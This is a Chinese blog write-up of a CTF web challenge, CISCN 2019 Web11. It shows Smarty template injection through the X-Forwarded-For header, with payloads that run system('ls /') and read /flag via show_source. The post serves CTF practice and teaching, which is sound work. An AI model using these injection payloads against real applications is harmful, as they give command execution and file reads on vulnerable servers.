CISCN 2019华东南Web11

2025-4-04 22:45

|

CTF,CTF-web,NSSCTF

|

849

162 字

|

1 分钟内

本文最后更新于445 天前，其中的信息可能已经过时，如有错误请发送邮件到big_fw@foxmail.com

Pasted image 20250404220853.png

一、访问网站

Pasted image 20250404222956.png

根据页面可知是php的smarty模板
在左上角的IP显示，很容易想到是XFF，又因为IP会变，而其他不变，有可能使用模板，推测XFF存在SSTI

二、验证XFF存在SSTI

XFF输入{{2*2}}输出4，存在SSTI注入
Pasted image 20250404223323.png

三、获取版本号

输入{$smarty.version}，使用无法使用{php}标签
Pasted image 20250404223508.png

四、执行RCE

输入{system('ls /')}，得到flag位置
Pasted image 20250404223923.png

五、获取flag

输入{if show_source('/flag')}{/if}，成功获取flag
Pasted image 20250404224022.png

总结

SSTI（smarty)注入：
{system(‘ls’)}
{if show_source(‘/flag’)}{/if}
XFF

文末附加内容

RCE Smarty SSTI

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!